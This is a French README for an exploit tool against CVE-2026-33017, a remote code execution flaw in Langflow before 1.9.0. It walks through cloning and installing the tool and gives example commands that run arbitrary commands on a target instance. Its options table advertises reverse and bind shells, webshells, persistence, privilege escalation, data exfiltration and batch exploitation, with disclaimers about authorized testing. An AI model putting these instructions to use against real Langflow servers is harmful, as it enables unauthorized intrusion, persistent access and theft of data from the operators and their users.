
Outil d'exploitation pour CVE-2026-33017 ciblant Langflow <1.9.0. Propose des reverse shells, l'exécution de commandes, des opérations sur fichiers, de la persistance et des tests automatisés. Valide l'impact de la vulnérabilité critique RCE. Réservé aux évaluations de sécurité autorisées.
CVE-2026-33017 · Tests de sécurité autorisés pour l'exécution de code à distance Langflow
Outils de recherche et d'équipe rouge pour valider CVE-2026-33017 sur des instances Langflow que vous êtes explicitement autorisé à évaluer. Pas pour une utilisation non autorisée.
Ce projet est destiné uniquement à :
L'accès non autorisé aux systèmes informatiques est illégal. Vous êtes seul responsable du respect des lois applicables et de l'obtention d'une autorisation écrite avant de tester une cible. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive.
Framework Python asynchrone pour évaluer les déploiements Langflow potentiellement affectés par CVE-2026-33017. Il prend en charge les vérifications de vulnérabilité, la sélection du mode de payload, les exécutions d'évaluation automatisées et la création de rapports structurés pour la documentation des engagements.
--check-only--auto / par lotshttpx avec journalisation configurableflow-id et client-id Langflow valides pour l'environnement de testgit clone https://github.com/CerberusMrXi/Langflow-cve-2026-33017-exploit
cd Langflow-cve-2026-33017-exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
--check-only
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "id"
python exploit.py \
-u http://127.0.0.1:7860 \
-f <FLOW_ID> \
-c <CLIENT_ID> \
-t command_exec \
--cmd "uname -a" \
--report markdown \
--output-file report.md
python exploit.py -u URL -f FLOW_ID -c CLIENT_ID [options]
.
├── exploit.py # CLI principal et moteur d'évaluation
├── requirements.txt # Dépendances Python
├── README.md # Ce fichier
└── venv/ # Environnement virtuel local (pas pour le contrôle de version)
Si une cible est vulnérable à CVE-2026-33017 :
--check-only pour vérifier le correctif--check-only avant tout mode de payloadLes contributions qui améliorent la fiabilité, les rapports, la précision de la détection ou la documentation défensive sont les bienvenues. Ouvrez un issue ou une pull request avec une description claire du changement et de la façon dont il a été validé dans un environnement de laboratoire.
Fourni pour les tests de sécurité autorisés et la recherche éducative uniquement.
Aucune garantie n'est fournie. Utilisez-le à vos propres risques et en conformité avec la loi.
Sudeepa Wanigarathna
Pour la recherche en sécurité autorisée · CVE-2026-33017
| Élément | Détail |
|---|
| CVE | CVE-2026-33017 |
| Cible | Langflow |
| Atténuation suggérée | Mettre à niveau vers Langflow ≥ 1.9.0 |
| Langage | Python 3.10+ |
| Version | 1.0.0 |
| Auteur | Sudeepa Wanigarathna |
| Drapeau |
|---|
| Description |
|---|
-u, --url | URL de base cible (ex. http://127.0.0.1:7860) |
-f, --flow-id | ID de flux Langflow |
-c, --client-id | Valeur du cookie Client ID |
| Drapeau | Description |
|---|
-t, --payload-type | reverse_shell, bind_shell, command_exec, file_read, file_upload, persistence, priv_esc, data_exfil, meterpreter, webshell, all (par défaut : reverse_shell) |
-l, --lhost | Hôte d'écoute (détection automatique lorsqu'omis le cas échéant) |
-p, --lport | Port d'écoute (requis pour les modes shell / meterpreter) |
--cmd | Chaîne de commande (command_exec) |
--file-path | Chemin pour les modes lecture/téléchargement de fichier |
--file-data | Contenu à télécharger (file_upload) |
| Drapeau | Description |
|---|
--auto | Flux de travail d'exploitation automatisé |
--check-only | Vérification de vulnérabilité uniquement |
--batch | Mode par lots |
--report | text | json | html | markdown |
--output-file | Écrire le rapport/la sortie dans un fichier |
-v, --verbose | Journalisation verbeuse |
-q, --quiet | Erreurs uniquement |